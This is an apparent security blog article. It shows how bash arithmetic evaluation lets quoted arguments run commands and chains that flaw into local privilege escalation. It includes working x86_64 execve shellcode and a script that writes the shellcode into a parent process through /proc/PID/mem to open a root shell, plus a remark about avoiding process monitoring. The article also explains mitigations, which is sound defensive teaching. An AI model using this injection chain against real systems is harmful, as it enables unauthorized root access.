Injecting Code into a Linux Process
Say, entirely hypothetically, we know of a shell script that is executed with root privileges via sudo, and we have found a way for normal users to make it call their own code.
For demonstration purposes it would then be nice to have code that invokes a local root shell, ready for interactive use in the current terminal.
This article walks through the whole chain, from exploiting an easy-to-overlook flaw in a shell script to injecting shellcode into the running shell interpreter.
The Shell Backdoor
One would hope that a shell script that runs as root only does minimal work, carefully verifies user-controlled input, always quotes all variables sufficiently and avoids well-known problematic constructs such as invoking eval.
This hope might or might not be justified.
However, one shell feature isn't that well known and may be overlooked as an attack vector:
Command substitution that the shell performs while evaluating an arithmetic expression, for example inside an array subscript.
Consider this small, innocuous-looking example (say, stored in blah.sh):
#!/bin/bash
if [[ "$1" -lt "$2" ]]; then
    echo hello
else
    echo world
fi
Arguments are fully quoted so what could possibly go wrong, right?
Right?
Well, we can try to invoke it like this:
./blah.sh 'a[$(touch xyz)]' 23
Sure enough, the current working directory now contains a file named xyz.
NB: There are other constructs besides [[ where arithmetic evaluation is applied, e.g. ((.
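To make the NB concrete, here is a minimal sketch that feeds the same kind of payload to three arithmetic contexts: the [[ comparison from blah.sh, the (( command and the $(( expansion. It assumes bash and works in a throwaway directory; the marker file names are made up for this illustration.

```bash
#!/bin/bash
# Sketch: one payload shape, three arithmetic contexts.
# Everything happens in a throwaway directory; the marker names are hypothetical.
workdir=$(mktemp -d)
cd "$workdir" || exit 1

# 1. Numeric comparison inside [[ ... ]], as in blah.sh
p='a[$(touch marker_test)]'
[[ "$p" -lt 23 ]] || true

# 2. Arithmetic command (( ... )): the value of p is itself evaluated
#    as an arithmetic expression
p='a[$(touch marker_cmd)]'
(( p )) || true

# 3. Arithmetic expansion $(( ... ))
p='a[$(touch marker_exp)]'
: "$(( p ))"

# Each marker that exists now proves that the embedded command ran
ls "$workdir"
```

In all three cases the variable is quoted or never word-split, so quoting alone does not help: the command substitution happens while the array subscript is evaluated.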
A local interactive shell
Strictly speaking, this is sufficient for demonstration purposes. It clearly demonstrates the flaw, and if it sits inside a script that an unprivileged user is allowed to invoke via a narrow sudo configuration, it is a local privilege escalation vulnerability.
But such a demo is also a little boring.
To make it more interesting, one may start a reverse shell, i.e. a shell that connects back over the network to the demo operator for interactive use.
But arguably the best thing for such a demo is to simply invoke an interactive shell inside the current terminal.
Injecting code into a Linux Process
The challenge with our vector is that our user-controlled code is executed by the shell inside a sub-process while for a local interactive shell we need to inject code into the parent process.
We can use the following two Linux features for this injection:
- /proc/$pid/syscall to determine the program counter of the parent
- /proc/$pid/mem for injecting code into the parent process
Since both processes run as the same user, or even as root, access to those files typically isn't restricted.
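To illustrate what /proc/$pid/syscall provides, the following sketch parses one line of that file. For a process blocked in a system call the line has nine fields (syscall number, six arguments, stack pointer, program counter); for a process blocked outside a system call it is -1 followed by stack pointer and program counter; otherwise it just reads "running". The helper name pc_from_syscall_line and the sample line are made up for this illustration.

```bash
#!/bin/bash
# pc_from_syscall_line: hypothetical helper, not part of the article's script.
# Prints the program counter found in one line of /proc/PID/syscall.
pc_from_syscall_line() {
    local -a fields
    read -r -a fields <<< "$1"
    case ${#fields[@]} in
        9) printf '%s\n' "${fields[8]}" ;;  # in a syscall: nr, 6 args, sp, pc
        3) printf '%s\n' "${fields[2]}" ;;  # blocked outside a syscall: -1, sp, pc
        *) return 1 ;;                      # e.g. "running": no pc available
    esac
}

# Made-up sample line in the nine-field layout
sample='0 0x3 0x55d0c8a4e2f0 0x200 0x0 0x0 0x0 0x7ffd4a3b2bf8 0x7f3c5e0f1c4a'
pc_from_syscall_line "$sample"

# Live example: the shell inspects itself while it is inside the read syscall
if [[ -r /proc/self/syscall ]] && read -r line < /proc/self/syscall; then
    pc_from_syscall_line "$line" || echo "no pc in: $line"
fi
```

The injection script later in this article takes the shortcut of cutting out field 9 directly, which is fine there because the parent is known to be blocked in a system call while it waits for the sub-process.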
So the basic idea is to let the sub-process inject something like the following into the parent process (at the current program counter):
char *cmd = "/bin/sh";
char *argv[2] = { cmd+5, 0 };
execve(cmd, argv, 0);
In other words, we want to inject some shellcode.
NB: Conveniently, the Linux kernel works around any read-only permissions of code mappings for writes via /proc/$pid/mem.
Shellcode
Depending on how the shellcode is injected, its requirements vary:
- when injecting via a C-string the code must not contain any zero bytes
- it must not be too long
- some kind of obfuscation may be useful
For our running example those first two requirements clearly don't apply. However, not wasting too many bytes is always a good idea.
The first sub-challenge is to get the "/bin/sh" string into memory, since we are injecting code and can't simply put it into the data segment.
A solution is to include the string as an immediate integer, push it to the stack and reference that stack location.
In x86_64 assembler (Intel syntax):
mov rcx, 0x68732f6e69622f # "/bin/sh\0" reversed
push rcx
This works, but the shellcode then contains a zero byte and the string shows up in the output of strings.
Alternatively, without any zero bytes and a little obfuscated:
# 150409396 * 195466812 - 1 = 0x68732f6e69622f
mov eax, 195466812
imul rax, rax, 150409396
dec rax
push rax
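The arithmetic in the comment can be checked directly in bash, whose integers are 64-bit signed, so the product fits. The sketch below recomputes the constant and then prints its bytes lowest first, which is the order they end up in memory on little-endian x86_64. The helper name decode_le is made up for this illustration.

```bash
#!/bin/bash
# Recompute the constant from the two factors used in the listing
value=$(( 150409396 * 195466812 - 1 ))
printf '0x%x\n' "$value"    # prints 0x68732f6e69622f

# decode_le: hypothetical helper that prints the bytes of a non-negative
# integer, lowest byte first (the in-memory order on little-endian machines)
decode_le() {
    local v=$1 out='' esc chr
    # Only accept plain digits: v is used in arithmetic contexts below
    [[ $v =~ ^[0-9]+$ ]] || return 1
    while (( v > 0 )); do
        printf -v esc '\\x%02x' "$(( v & 0xff ))"   # e.g. \x2f
        printf -v chr '%b' "$esc"                    # turn the escape into the byte
        out+=$chr
        v=$(( v >> 8 ))
    done
    printf '%s\n' "$out"
}

decode_le "$value"          # prints /bin/sh
```

Only seven bytes are non-zero; the terminating zero byte of the string comes for free from the high byte of the 8-byte value that push rax stores.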
Other sub-challenges may involve using slightly non-obvious instruction sequences to save a few bytes.
For example, when setting the syscall number, instead of a simple
mov eax, 0x3b # execve syscall nr
one can use the equivalent:
xor eax, eax # the same, but shorter and without zero bytes ...
mov al, 0x3b # execve syscall nr
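The saving can be counted from the machine code. The sketch below compares the two encodings, assuming the standard x86_64 encoding b8 3b 00 00 00 for the plain mov with a 32-bit immediate, and 31 c0 b0 3b for the two-instruction variant (the latter bytes also appear in the full listing). The helper name byte_stats is made up for this illustration.

```bash
#!/bin/bash
# byte_stats: hypothetical helper; prints "<length> <number of zero bytes>"
# for a string of hex bytes (whitespace is ignored)
byte_stats() {
    local hex=${1//[[:space:]]/} zeros=0 i
    for (( i = 0; i < ${#hex}; i += 2 )); do
        if [[ ${hex:i:2} == 00 ]]; then
            zeros=$(( zeros + 1 ))
        fi
    done
    echo "$(( ${#hex} / 2 )) $zeros"
}

byte_stats 'b8 3b 00 00 00'   # mov eax, 0x3b              -> 5 3
byte_stats '31 c0 b0 3b'      # xor eax, eax; mov al, 0x3b -> 4 0
```

One byte shorter and free of zero bytes, at the cost of one extra instruction.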
The complete shellcode I came up with is 32 bytes long and reads:
 0:  31 d2                 xor  edx,edx
 2:  b8 3c 96 a6 0b        mov  eax,0xba6963c
 7:  48 69 c0 b4 10 f7 08  imul rax,rax,0x8f710b4
 e:  48 ff c8              dec  rax
11:  50                    push rax
12:  48 89 e7              mov  rdi,rsp
15:  52                    push rdx
16:  57                    push rdi
17:  31 c0                 xor  eax,eax
19:  b0 3b                 mov  al,0x3b
1b:  48 89 e6              mov  rsi,rsp
1e:  0f 05                 syscall
See also my Git repository for the complete commented assembly source.
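As a quick sanity check, the opcode bytes of the listing can be fed through a few lines of bash that count them, look for zero bytes and print them as printf-style escapes. This is only a sketch; the variable names are made up, and the bytes are copied from the disassembly above.

```bash
#!/bin/bash
# Opcode bytes copied from the listing, one entry per instruction
insns=(
    '31 d2'                  # xor edx,edx
    'b8 3c 96 a6 0b'         # mov eax,0xba6963c
    '48 69 c0 b4 10 f7 08'   # imul rax,rax,0x8f710b4
    '48 ff c8'               # dec rax
    '50'                     # push rax
    '48 89 e7'               # mov rdi,rsp
    '52'                     # push rdx
    '57'                     # push rdi
    '31 c0'                  # xor eax,eax
    'b0 3b'                  # mov al,0x3b
    '48 89 e6'               # mov rsi,rsp
    '0f 05'                  # syscall
)

# Flatten into one array element per byte
read -r -a bytes <<< "${insns[*]}"
echo "${#bytes[@]} bytes"

# Zero bytes would break injection via a C string
if [[ " ${bytes[*]} " == *" 00 "* ]]; then
    echo "contains zero bytes"
else
    echo "no zero bytes"
fi

# The same bytes as escapes for printf
escaped=$(printf '\\x%s' "${bytes[@]}")
echo "$escaped"
```

The count matches the offsets in the listing: the last instruction starts at 0x1e and is two bytes long, which gives 0x20 = 32 bytes.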
The process injection
The first reflex for writing a few bytes to /proc/$pid/mem may be to use dd.
However, dd is cumbersome to use, is not available everywhere and might even raise suspicion in process monitoring.
As an alternative, one can open the file and seek within it by other means in a shell script.
A complete injection shell script example:
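# program counter of the parent: the ninth field of /proc/$PPID/syscall
pc=$(cut -d ' ' -f9 /proc/$PPID/syscall)
# open the parent's memory read-write; bash stores the new descriptor in $fd
exec {fd}<>/proc/$PPID/mem
# seek trick: cmp skips $pc bytes on its stdin and then compares nothing
<&$fd cmp -n 0 - - $pc
# overwrite the code at the parent's program counter with the shellcode
printf '\x31\xd2...\x48\x89\xe6\x0f\x05' >&$fd
echo Have fun ... >&2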
Process injection into our running example is then as simple as:
$ ./blah.sh 'a[$(./inj.sh)]' 2
Have fun ...
sh-5.2$
Again, see also my Git repository for the complete script.
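The open, seek and write steps of the script can be tried harmlessly on a scratch file instead of /proc/$PPID/mem. The sketch below assumes bash 4.1 or later for the {fd} syntax and GNU cmp from diffutils; the file content and the offset are made up for this illustration.

```bash
#!/bin/bash
# Harmless stand-in for /proc/$PPID/mem: a scratch file with 16 bytes
target=$(mktemp)
printf 'AAAAAAAAAAAAAAAA' > "$target"
offset=4

# Open read-write without truncating; bash picks a free descriptor
exec {fd}<>"$target"

# cmp inherits the descriptor as stdin and skips $offset bytes on it.
# The file offset is shared with our descriptor, so it stays moved.
<&"$fd" cmp -n 0 - - "$offset"

# printf writes through the same descriptor, i.e. at the new offset
printf 'BBBB' >&"$fd"
exec {fd}>&-

result=$(cat "$target")
echo "$result"    # with GNU cmp: AAAABBBBAAAAAAAA
rm -f "$target"
```

The trick relies on the child and the shell sharing one open file description: a seek performed by the child is still in effect when the shell writes afterwards.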
Mitigations
Since quite a lot of userspace software relies on those interfaces, the Linux kernel developers are hesitant to remove them or restrict their usage. However, recent kernel development has seen some efforts to give distributions a way to somewhat restrict /proc/$pid/mem usage.
It remains to be seen whether the Linux kernel merges something like that.
Of course, a Linux Security Module (LSM) such as SELinux might help to make the described techniques harder to exploit in some contexts.
Last but not least, it always makes sense to review the usage of shell scripting. Shell scripting is often the wrong tool for the job, especially in security-sensitive contexts. And especially when a shell script grows large, it's usually a sign that one should have switched to a more appropriate implementation language some time ago.
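Where a script has to stay in shell, one way to close this particular vector is to check that operands are plain integers before they reach any arithmetic context. The following is a minimal sketch of that idea, not a complete hardening recipe; the helper names is_plain_int and safe_lt are made up, and values outside the 64-bit range are not handled.

```bash
#!/bin/bash
# is_plain_int: hypothetical helper; accepts only a canonical decimal
# integer (no leading zeros, so nothing is read as octal)
is_plain_int() {
    local re='^(0|-?[1-9][0-9]*)$'
    [[ $1 =~ $re ]]
}

# safe_lt: compare only after both operands passed validation.
# Returns 0 if $1 < $2, 1 if not, 2 if an operand was rejected.
safe_lt() {
    is_plain_int "$1" && is_plain_int "$2" || return 2
    [[ "$1" -lt "$2" ]]
}

safe_lt 5 23 && echo "5 is less than 23"
safe_lt 'a[$(touch xyz)]' 23 || echo "payload rejected (status $?)"
```

The regular expression match treats its left-hand side as a plain string, so the payload is never evaluated and no file named xyz appears.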
Related Work
The ideas and techniques described in this article aren't novel.
A bit of web searching easily turns up references that are a decade or more old. People also rediscover these bits and pieces from time to time.
Coming up with clever shellcode for various architectures is a sport of its own, and people like to share their results. Thus, this article arguably also illustrates that getting started from first principles doesn't take too much effort, is very instructive and can be fun.
Selected list of related work:
- A /proc/PID/mem vulnerability. LWN, Jake Edge, 2012 - reports on the pitfalls of properly implementing that access in the kernel
- Re: Arithmetic + array allows for code injection. Bash bug mailing list, Maarten Billemont, 2014 - summarises that thread a bit
- Answer to Security Implications of using unsanitized data in Shell Arithmetic evaluation. Unix Stackexchange, Stéphane Chazelas, 2014 - also illustrates how to overwrite the PATH variable via arithmetic evaluation, i.e. when the CWD of the script is writable by an attacker
- Answer to Security implications of forgetting to quote a variable in bash/POSIX shells. Unix Stackexchange, Stéphane Chazelas, 2014 - covers more ground but also touches on arithmetic evaluation
- Bash’s white collar eval: [[ $var -eq 42 ]] runs arbitrary code too. Vidar, 2018 - Blog post on this topic
- Unprivileged Process Injection Techniques in Linux. joev, 2024 - Blog post that includes some historic references and shows limited usage of the Metasploit framework
- Mastodon comment. Kees Cook, 2024 - this thread includes some misconceptions held by knowledgeable people, which demonstrates the complexity of writing robust shell scripts in the presence of such obscure features
Code
See also my Git repository for all the source code used in this article.